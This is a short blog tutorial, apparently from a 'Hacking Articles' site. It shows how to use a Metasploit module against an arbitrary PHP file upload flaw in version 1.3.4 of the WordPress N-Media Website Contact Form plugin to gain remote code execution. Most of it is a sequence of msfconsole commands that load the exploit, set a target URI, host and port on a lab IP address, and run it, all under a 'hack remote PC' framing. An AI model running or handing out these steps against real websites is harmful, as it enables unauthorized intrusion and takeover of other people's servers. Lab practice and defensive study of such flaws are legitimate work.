This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.
Exploit Targets
WordPress N-Media Website Contact Form plugin
Requirement
Attacker: kali Linux
Victim PC: WordPress Installed
Open Kali terminal type msfconsole
Now type use exploit/unix/webapp/wp_nmediawebsite_file_upload
msf exploit (wp_nmediawebsite_file_upload)>set targeturi http://192.168.0.110/wordpress
msf exploit (wp_nmediawebsite_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_nmediawebsite_file_upload)>set rport 80
msf exploit (wp_nmediawebsite_file_upload)>exploit
The post Hack Remote PC using WordPress N-Media Website Contact Form with File Upload Vulnerability appeared first on Hacking Articles.